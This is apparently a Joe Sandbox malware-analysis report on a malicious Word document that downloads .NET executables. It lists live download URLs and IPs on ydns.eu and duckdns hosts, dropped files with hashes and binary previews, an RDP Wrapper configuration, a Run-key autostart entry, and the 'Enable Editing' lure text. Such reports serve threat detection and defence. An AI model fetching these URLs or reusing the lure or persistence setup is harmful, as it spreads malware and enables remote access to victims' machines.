httP://newhosteeeee.ydns.eu/micr	0%	Avira URL Cloud	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.piriform.comJ	0%	Avira URL Cloud	safe
httP://newhosteeeee.ydns.eu/microA.exePE	0%	Avira URL Cloud	safe
httP://newhosteeeee.ydn	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
newhosteeeee.ydns.eu	203.159.80.186	true	false	high
sdafsdffssffs.ydns.eu	203.159.80.186	true	false	high
hutyrtit.ydns.eu	203.159.80.165	true	false	high
hhjhtggfr.duckdns.org	203.159.80.186	true	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://newhosteeeee.ydns.eu/microA.exe	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://hutyrtit.ydns.eu/microC.exe	true	18%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	powershell.exe, 00000003.00000002.2101386936.00000000024C0000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2103676493.0000000002520000.00000002.00000001.sdmp	false		high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv	powershell.exe, 00000003.00000002.2099920892.0000000000419000.00000004.00000020.sdmp, powershell.exe, 00000006.00000002.2100972290.000000000039E000.00000004.00000020.sdmp	false		high
http://newhosteeeee.ydns.eu	powershell.exe, 00000003.00000002.2107782562.000000000372A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
httP://newhosteeeee.ydns.eu/microA.exe	powershell.exe, 00000006.00000002.2108498771.0000000003823000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2101479507.0000000000654000.00000004.00000040.sdmp, powershell.exe, 00000006.00000002.2101084138.0000000000413000.00000004.00000020.sdmp, powershell.exe, 00000006.00000002.2101559005.0000000001C26000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2100972290.000000000039E000.00000004.00000020.sdmp	true		unknown
http://www.piriform.com/ccleaner	powershell.exe, 00000003.00000002.2099920892.0000000000419000.00000004.00000020.sdmp, powershell.exe, 00000006.00000002.2100972290.000000000039E000.00000004.00000020.sdmp	false		high
httP://newhosteeeee.ydns.eu/micr	powershell.exe, 00000003.00000002.2107782562.000000000372A000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2108498771.0000000003823000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://www.%s.comPA	powershell.exe, 00000003.00000002.2101386936.00000000024C0000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2103676493.0000000002520000.00000002.00000001.sdmp	false	URL Reputation: safe	low
https://github.com/syohex/java-simple-mine-sweeperC:	microA.exe, 0000000A.00000002.2168254324.0000000001FFB000.00000004.00000001.sdmp, microA.exe, 0000000B.00000002.2168345200.0000000002266000.00000004.00000001.sdmp	false		high
http://www.piriform.comJ	powershell.exe, 00000006.00000002.2100972290.000000000039E000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
httP://newhosteeeee.ydns.eu/microA.exePE	powershell.exe, 00000003.00000002.2107782562.000000000372A000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2108498771.0000000003823000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
https://github.com/syohex/java-simple-mine-sweeper	microA.exe, images.exe	false		high
http://www.piriform.com/ccleanerhttp://w	powershell.exe, 00000003.00000002.2099858527.00000000003CE000.00000004.00000020.sdmp	false		high
httP://newhosteeeee.ydn	powershell.exe, 00000006.00000002.2108498771.0000000003823000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
203.159.80.186	newhosteeeee.ydns.eu	Netherlands		47987	LOVESERVERSGB	false
203.159.80.165	hutyrtit.ydns.eu	Netherlands		47987	LOVESERVERSGB	false

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	457806
Start date:	02.08.2021
Start time:	10:44:41
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 15m 11s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	N40-MR 311.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	34
Number of new started drivers analysed:	4
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.phis.troj.spyw.expl.evad.winDOC@44/32@14/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 44.9% (good quality ratio 44.1%) Quality average: 86.9% Quality standard deviation: 20.6%
HCA Information:	Successful, ratio: 93% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active ActiveX Object Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe TCP Packets have been reduced to 100 Not all processes where analyzed, report is missing behavior information Report creation exceeded maximum time and may have missing behavior and disassembly information. Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size exceeded maximum capacity and may have missing disassembly code. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtEnumerateValueKey calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
10:45:42	API Interceptor	78x Sleep call for process: powershell.exe modified
10:45:46	API Interceptor	624x Sleep call for process: microA.exe modified
10:46:21	API Interceptor	928x Sleep call for process: images.exe modified
10:46:55	API Interceptor	399x Sleep call for process: cmd.exe modified
10:46:58	API Interceptor	404x Sleep call for process: JhwfHBtD..exe modified
10:47:05	API Interceptor	44x Sleep call for process: drvinst.exe modified
10:47:30	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run SMTP Service C:\Program Files (x86)\SMTP Service\smtpsvc.exe
10:47:39	API Interceptor	17x Sleep call for process: smtpsvc.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Program Files\Microsoft DN1\rdpwrap.ini Download File
Process:	C:\Users\user\AppData\Local\Temp\images.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	181846
Entropy (8bit):	5.421809355655133
Encrypted:	false
SSDEEP:	768:WEUfQYczxEQBLWf9PUupBdfbQnxJcRZsMFdKlax8Rr/d6gl/+f8jZ0fyL+8F7f6/:57f6GqZm0c11IvimstYUWtN/7
MD5:	6BC395161B04AA555D5A4E8EB8320020
SHA1:	F18544FAA4BD067F6773A373D580E111B0C8C300
SHA-256:	23390DFCDA60F292BA1E52ABB5BA2F829335351F4F9B1D33A9A6AD7A9BF5E2BE
SHA-512:	679AC80C26422667CA5F2A6D9F0E022EF76BC9B09F97AD390B81F2E286446F0658524CCC8346A6E79D10E42131BC428F7C0CE4541D44D83AF8134C499436DAAE
Malicious:	false
Reputation:	unknown
Preview:	; RDP Wrapper Library configuration..; Do not modify without special knowledge....[Main]..Updated=2020-08-25..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[PatchCodes]..nop=90..Zero=00..jmpshort=EB..nopjmp=90E9..CDefPolicy_Query_edx_ecx=BA000100008991200300005E90..CDefPolicy_Query_eax_rcx_jmp=B80001000089813806000090EB..CDefPolicy_Query_eax_esi=B80001000089862003000090..CDefPolicy_Query_eax_rdi=B80001000089873806000090..CDefPolicy_Query_eax_ecx=B80001000089812003000090..CDefPolicy_Query_eax_ecx_jmp=B800010000898120030000EB0E..CDefPolicy_Query_eax_rcx=B80001000089813806000090..CDefPolicy_Query_edi_rcx=BF0001000089B938060000909090....[SLInit]..bServerSku=1..bRemoteConnAllowed=1..bFUSEnabled=1..bAppServerAllowed=1..bMultimonAllowed=1..lMaxUserSessions=0..ulMaxDebugSessions=0..bInitialized=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionM

C:\Program Files\Microsoft DN1\sqlmap.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\images.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	116736
Entropy (8bit):	5.884975745255681
Encrypted:	false
SSDEEP:	3072:m3zxbyHM+TstVfFyov7je9LBMMmMJDOvYYVs:oMjTiVw2ve9LBMMpJsT
MD5:	461ADE40B800AE80A40985594E1AC236
SHA1:	B3892EEF846C044A2B0785D54A432B3E93A968C8
SHA-256:	798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4
SHA-512:	421F9060C4B61FA6F4074508602A2639209032FD5DF5BFC702A159E3BAD5479684CCB3F6E02F3E38FB8DB53839CF3F41FE58A3ACAD6EC1199A48DC333B2D8A26
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 20%, Browse Antivirus: ReversingLabs, Detection: 43%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.rB/.!B/.!B/.!.~.!j/.!.~.!&/.!.~3!H/.!..'!G/.!B/.!./.!O}.!F/.!O}0!C/.!O}7!C/.!O}2!C/.!RichB/.!................PE..d...Z..T.........." .................Q....................................... ............`.........................................0...l.......<...................................................................`...p............ ...............................text............................... ..`.rdata..<.... ......................@..@.data....=..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................

C:\ProgramData\images.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\microA.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	525312
Entropy (8bit):	6.318909143915524
Encrypted:	false
SSDEEP:	12288:n02Xq6JYELsqsEXQ3MXw7vy/CdBJpS6R6jH24wqcHf7a:J3jscXQcXGjdS6R6jHsqr
MD5:	100C3E2649FD32CE6D7E108E1A2EBF0D
SHA1:	7F6C8FAB6FA84AD9F12D4CF08CB684D525073230
SHA-256:	29A4C97029DCF52E73BB65D748D1FD6194C5F7F72FE8C272320BBE38636E0F3A
SHA-512:	96570F3A334448CCE354A784C3F9D43594A21329D2784DC459B6CC27AABA6B5132FA2D0A4B889CBDAA75394CF1C6C1BEBCD5EE694F7F0528A398665C611BF936
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 40%, Browse Antivirus: ReversingLabs, Detection: 63%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a.....................2........... ........@.. .......................`............@.....................................W......../...................@....................................................... ............... ..H............text........ ...................... ..`.rsrc..../.......0..................@..@.reloc.......@......................@..B........................H............!...........@..$............................................0.............-.&(....+.&+.....0..........s....(....t.....-.&+......+.....~......0...........(.......,.&&.(....o.....-.&&+.}....+.}....+.......0...........{.....-)&.E........2...M...o...................+..+.....,.&&. ..y.-.&&..}.....+.}....+.}....+...}..... ...}......}.......}......{.... ...Na}......}.......}..... ..5.}......}.......}......{.... I.7a}......}.......}..... A.D.}......}.....*.

C:\Users\user\AppData\Local\Microsoft Vision\02-08-2021_10.46.55 Download File
Process:	C:\Users\user\AppData\Local\Temp\images.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	3.113204882778696
Encrypted:	false
SSDEEP:	3:blXlulovDluLAnyWdl+SliXln:zuWpyWn+Sk1
MD5:	4B99C50453B52153CB7CFB2810B982D8
SHA1:	FD7A010AD17F7F9D21B3F37FB8B15644CCC661C7
SHA-256:	30EE264F1887C07BD390E0AB05F62FC8E1064CAFBECA6A679C345C934CD52F08
SHA-512:	F6C9E795F955812F370565B8EAB62BEFC6EE9DA3E2619098DC3425C79539EA507C2F1CA0F7122E46692F33586E1811D5BBF4F6F40150187269025F48208CED6D
Malicious:	false
Reputation:	unknown
Preview:	..{.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.}...L.e.f.t. .W.i.n.d.o.w.s.r.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\microC[1].exe Download File
Process:	C:\Users\user\AppData\Local\Temp\images.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	1378816
Entropy (8bit):	7.548476087877472
Encrypted:	false
SSDEEP:	24576:26IBQ76DOifx8Dgyfx8Dgz06TbTZpq72pMNaDuDHQUl3uwDZzGL:OQ76f58Dgy58Dgz06n1pfWNdlJZa
MD5:	8FA8F52DFC55D341300EFF8E4C44BA33
SHA1:	4FBDB8C39BBC48B159E1F795A2222D51077FDBE9
SHA-256:	2C7DA7FF43C90AE620FD5135C2ED34C7E644A9A1098BFB69F1DC6B8AB6410C9A
SHA-512:	A29B2B8FCDE4EF5917E6AAD29C547D2FCEF3E452B3ED502788BD5BF7CB2E107C46A12783EBBE8EB4AA896C56DFD3FD37C994B67EB5C8F5C9C32FBA75FE486205
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 20%
Reputation:	unknown
IE Cache URL:	http://hutyrtit.ydns.eu/microC.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...1..a..............P..............L... ...`....@.. .......................`............@..................................K..O....`.. ....................@....................................................... ............... ..H............text....,... ...................... ..`.rsrc... ....`.......0..............@..@.reloc.......@......................@..B.................K......H........0..d.......s........o............................................(....&..(......s.........s ........s!........s"........s#...........0...........~....o$....+...0...........~....o%....+...0...........~....o&....+...0...........~....o'....+...0...........~....o(....+...0..<........~.....().....,!r...p.....(...o+...s,............~.....+...0...........~.....+.."........0..&........(....r1..p~....o-...(......t$....+..*...0..&........(....r7..p~....o-...(......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\microA[1].exe Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	525312
Entropy (8bit):	6.318909143915524
Encrypted:	false
SSDEEP:	12288:n02Xq6JYELsqsEXQ3MXw7vy/CdBJpS6R6jH24wqcHf7a:J3jscXQcXGjdS6R6jHsqr
MD5:	100C3E2649FD32CE6D7E108E1A2EBF0D
SHA1:	7F6C8FAB6FA84AD9F12D4CF08CB684D525073230
SHA-256:	29A4C97029DCF52E73BB65D748D1FD6194C5F7F72FE8C272320BBE38636E0F3A
SHA-512:	96570F3A334448CCE354A784C3F9D43594A21329D2784DC459B6CC27AABA6B5132FA2D0A4B889CBDAA75394CF1C6C1BEBCD5EE694F7F0528A398665C611BF936
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 40%, Browse Antivirus: ReversingLabs, Detection: 63%
Reputation:	unknown
IE Cache URL:	http://newhosteeeee.ydns.eu/microA.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a.....................2........... ........@.. .......................`............@.....................................W......../...................@....................................................... ............... ..H............text........ ...................... ..`.rsrc..../.......0..................@..@.reloc.......@......................@..B........................H............!...........@..$............................................0.............-.&(....+.&+.....0..........s....(....t.....-.&+......+.....~......0...........(.......,.&&.(....o.....-.&&+.}....+.}....+.......0...........{.....-)&.E........2...M...o...................+..+.....,.&&. ..y.-.&&..}.....+.}....+.}....+...}..... ...}......}.......}......{.... ...Na}......}.......}..... ..5.}......}.......}......{.... I.7a}......}.......}..... A.D.}......}.....*.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\623BB84A.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	370 sysV pure executable
Category:	dropped
Size (bytes):	262160
Entropy (8bit):	0.0018462035600765214
Encrypted:	false
SSDEEP:	3:pl0vUjlds0lhplV:plFjHl
MD5:	7320DCAD6F58A7626688E3346C59FB9D
SHA1:	95F22C3493F3916A79920F1FDD32942FD7CB1B52
SHA-256:	88C3D9C21B7A39E285E54676529512993B844D30B5E40E8FBF2B34E869E4CB09
SHA-512:	E7C522C3F68AE80BA5F113A65008E70E33A0E7E38737BC41D430FDC1281F3F8639E99CD95B2B02486B6CE7E9EA74B3963A12BFFA0FF98B5E6692D193BD5BDEC5
Malicious:	false
Reputation:	unknown
Preview:	X.3.......V.......................................................................................................................................................................................................................................................................................................................................................................3.......3.....`.H.....`.H.......^......`..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C7AFD7C3.wmf Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map - RLE 65536 x 65536 x 0 "\005"
Category:	dropped
Size (bytes):	3730
Entropy (8bit):	5.026467359865648
Encrypted:	false
SSDEEP:	48:bWik/UKHl3G6nj6rmbYf3LSrd/lO88e0f5aSdJ9nNk3t1fo:Dk7Hgwj+mbYf3LSrhlOs0f5aSdHn63DA
MD5:	AA1DE9BEC1EFF394C0675CE0C0A0A528
SHA1:	D721B360C9A741BE082BBB8F7DC8CE060CB632B5
SHA-256:	2B1328D263D1E24EDCAAA2EFFF95394266DC135F2C25F23B9C14D731C0D82BE9
SHA-512:	7EB306A4DC928E82E935B54143C2C835266F9A435DBF4A7EFCFD441030083CB4163A4D6F979073DF2A12CA11071C796C2981B47398806CCB4476477CF5CB9800
Malicious:	false
Reputation:	unknown
Preview:	..................................5...........................Segoe UI....C......@..........0....-...........................A..... . ..... . ...7.(... ...@.............................................................................................................................................................................................................................................................................................?.........!...A.F.f. . ..... . ...7.(... ... ................................................................................................................................................................................................................................................................................................................................G .>..:..9..8..8..8..9..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:.i2........K..S(.O$.N!.N!.N!.N!.N".M".M".M".M".M".M".M".M".M".M".M".M".M".M".M".M".N".M".M".O$.S).O".......l

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{16BDD4F7-5649-4CA3-B477-D1894D362AA0}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Reputation:	unknown
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5BF9671F-2E3A-44D5-BCB8-F09587EE439D}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	1.3586208805849456
Encrypted:	false
SSDEEP:	3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbJ:IiiiiiiiiifdLloZQc8++lsJe1MzKn
MD5:	DCF291F67A7578B35021AAD4C50CB5A6
SHA1:	6215EAC6E23A9C1336F2D978B5E089747876B0D7
SHA-256:	6DE5A7D8ACE210C980D5E844B19D1206EC3CEE8217AD8BB4589B620EFE4BE602
SHA-512:	50646EF6A0C9E4B3FF288DA6454ED11375E5290439B8CE3F68680B23881F3BCA7299220D2DC862E8249D960D08365E94851A73FB492E5335FB2064A45AED1507
Malicious:	false
Reputation:	unknown
Preview:	..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B23AFD94-9DC7-4781-962F-A2FE031B5447}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	44618
Entropy (8bit):	2.916471247772259
Encrypted:	false
SSDEEP:	768:DI/3ViFs0Dqeb4Zep84JtueJvCI19rIwzWSgUg4P58F:OFia0Dqeb0nstw29rVzWSgm58F
MD5:	B6BB1516BC2697E94D326CBBCC9F1ED3
SHA1:	1AF36DE9D0028776B9993450506BB4966C2CEDF5
SHA-256:	19FC84D8574FB1926C05EBDE1833E380E9C7B09175E161245B628345C5B566C7
SHA-512:	41C74E5753D594AFC6F66CD4D08DBF628C1FDFEA97EAA55C10CA0C24555CAE4BC487A1BD3B8AC6E3C75A6A352B8229EDCEED754E88552109E7DB21AA800EEC15
Malicious:	false
Reputation:	unknown
Preview:	c.0.5.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .d.o.e.s. .n.o.t. .w.o.r.k. .i.n. .e.m.a.i.l. .P.r.e.v.i.e.w.....P.l.e.a.s.e. .d.o.w.n.l.o.a.d. .t.h.e. .d.o.c.u.m.e.n.t. .a.n.d. .c.l.i.c.k. .E.n.a.b.l.e. .E.d.i.t.i.n.g. .w.h.e.n. .o.p.e.n.i.n.g.......=......... .P.a.c.k.a.g.e.E.M.B.E.D.W.o.r.d...D.o.c.u.m.e.n.t...8.........=....... .\.a. .W.o.r.d...D.o.c.u.m.e.n.t...8. .".%.T.M.P.%.\.\.a.b.d.t.f.h.g.h.g.d.g.h.g.h.....S.C.T.". .".e.w.:.{.0.0.0.0.0.0.0.0.-.0.0.0.0.-.0.0.0.0.-.0.0.0.0.-.0.0.0.0.0.0.0.0.0.0.0.0.}.".....................................4...>...D.................................................................................................................................................................................................................................................................................................................CJ..OJ..QJ..^J..aJ.....j....CJ..OJ..QJ..U..^J..aJ.. .jRK.d...CJ..OJ..QJ..U..^J..aJ.....h.CK.5..CJ..OJ..QJ..^J..aJ....h.CK.CJ..OJ..QJ..^J..aJ.

C:\Users\user\AppData\Local\Temp\OICE_E3CA6E03-B995-4FF4-BE46-DA58B35F69D7.0\FLDE10.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	370 sysV pure executable
Category:	dropped
Size (bytes):	262160
Entropy (8bit):	0.0018462035600765214
Encrypted:	false
SSDEEP:	3:pl0vUjlds0lhplV:plFjHl
MD5:	7320DCAD6F58A7626688E3346C59FB9D
SHA1:	95F22C3493F3916A79920F1FDD32942FD7CB1B52
SHA-256:	88C3D9C21B7A39E285E54676529512993B844D30B5E40E8FBF2B34E869E4CB09
SHA-512:	E7C522C3F68AE80BA5F113A65008E70E33A0E7E38737BC41D430FDC1281F3F8639E99CD95B2B02486B6CE7E9EA74B3963A12BFFA0FF98B5E6692D193BD5BDEC5
Malicious:	false
Reputation:	unknown
Preview:	X.3.......V.......................................................................................................................................................................................................................................................................................................................................................................3.......3.....`.H.....`.H.......^......`..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	20484
Entropy (8bit):	5.8212599537661855
Encrypted:	false
SSDEEP:	384:3ym/aIgzzacasapa2hoygn1VYdNl6UnRJbtqEEE6oEaE3/nh:3ym/aPzacasapa2vgnrYdNl6Un7ZFPWb
MD5:	1F2E1026EC8215FE6675E530298AFB02
SHA1:	4EA510B155F89DD4DE8CD675F83098163313C8CB
SHA-256:	D01849322FB63DBEE407622DD544A9BDE724D44701650821FD291461184AE258
SHA-512:	09DCB507DAE03C1D1B079C3877B8970E54E1B1AC13DB76CB40630FA01A1AF85A201D1F836F5466C9DBC6DF0437928051994588B8420C8B91D173E6DA2EE1A441
Malicious:	true
Reputation:	unknown
Preview:	..<scriptleT.. >.. .......................... .............. ................. ........ ................. ...... ..............'... .............. ........... ........... ................... ...... ........ ........... ............ ...... .................... ........... ............ ...... ............'... ............................ ...... ........ ........... ................. ...... ........... ........ ...................... .................... ......... ......................... ..

C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT:Zone.Identifier Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	27
Entropy (8bit):	3.9582291686698787
Encrypted:	false
SSDEEP:	3:gAWY3W:qY3W
MD5:	833C0EFD3064048FD6A71565CA115CCD
SHA1:	0E6D2A1D4B6AFA705EA6267EEED3655FD2B39B9D
SHA-256:	4A86B6E7D2544AFC717EAC2B60ADBED0F0C68D49D723B2123F65C64C76579FBF
SHA-512:	536C2BB6ED98C190CE98BE01A31BD05FE03D90532B5B4194CAA58671F43AD4D65F7F828D8AC1F43A6A13DCA581205416DA094CA4DACAEFACB8D901FC48CCEB7A
Malicious:	false
Reputation:	unknown
Preview:	[ZoneTransfer]..ZoneId=3..3

C:\Users\user\AppData\Local\Temp\images.exe Download File
Process:	C:\ProgramData\images.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	525312
Entropy (8bit):	6.318909143915524
Encrypted:	false
SSDEEP:	12288:n02Xq6JYELsqsEXQ3MXw7vy/CdBJpS6R6jH24wqcHf7a:J3jscXQcXGjdS6R6jHsqr
MD5:	100C3E2649FD32CE6D7E108E1A2EBF0D
SHA1:	7F6C8FAB6FA84AD9F12D4CF08CB684D525073230
SHA-256:	29A4C97029DCF52E73BB65D748D1FD6194C5F7F72FE8C272320BBE38636E0F3A
SHA-512:	96570F3A334448CCE354A784C3F9D43594A21329D2784DC459B6CC27AABA6B5132FA2D0A4B889CBDAA75394CF1C6C1BEBCD5EE694F7F0528A398665C611BF936
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 40%, Browse Antivirus: ReversingLabs, Detection: 63%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a.....................2........... ........@.. .......................`............@.....................................W......../...................@....................................................... ............... ..H............text........ ...................... ..`.rsrc..../.......0..................@..@.reloc.......@......................@..B........................H............!...........@..$............................................0.............-.&(....+.&+.....0..........s....(....t.....-.&+......+.....~......0...........(.......,.&&.(....o.....-.&&+.}....+.}....+.......0...........{.....-)&.E........2...M...o...................+..+.....,.&&. ..y.-.&&..}.....+.}....+.}....+...}..... ...}......}.......}......{.... ...Na}......}.......}..... ..5.}......}.......}......{.... I.7a}......}.......}..... A.D.}......}.....*.

C:\Users\user\AppData\Local\Temp\microA.exe Download File
Process:	C:\Users\user\AppData\Roaming\microA.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	525312
Entropy (8bit):	6.318909143915524
Encrypted:	false
SSDEEP:	12288:n02Xq6JYELsqsEXQ3MXw7vy/CdBJpS6R6jH24wqcHf7a:J3jscXQcXGjdS6R6jHsqr
MD5:	100C3E2649FD32CE6D7E108E1A2EBF0D
SHA1:	7F6C8FAB6FA84AD9F12D4CF08CB684D525073230
SHA-256:	29A4C97029DCF52E73BB65D748D1FD6194C5F7F72FE8C272320BBE38636E0F3A
SHA-512:	96570F3A334448CCE354A784C3F9D43594A21329D2784DC459B6CC27AABA6B5132FA2D0A4B889CBDAA75394CF1C6C1BEBCD5EE694F7F0528A398665C611BF936
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 40%, Browse Antivirus: ReversingLabs, Detection: 63%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a.....................2........... ........@.. .......................`............@.....................................W......../...................@....................................................... ............... ..H............text........ ...................... ..`.rsrc..../.......0..................@..@.reloc.......@......................@..B........................H............!...........@..$............................................0.............-.&(....+.&+.....0..........s....(....t.....-.&+......+.....~......0...........(.......,.&&.(....o.....-.&&+.}....+.}....+.......0...........{.....-)&.E........2...M...o...................+..+.....,.&&. ..y.-.&&..}.....+.}....+.}....+...}..... ...}......}.......}......{.... ...Na}......}.......}..... ..5.}......}.......}......{.... I.7a}......}.......}..... A.D.}......}.....*.

C:\Users\user\AppData\Roaming\JhwfHBtD..exe Download File
Process:	C:\Users\user\AppData\Local\Temp\images.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1378816
Entropy (8bit):	7.548476087877472
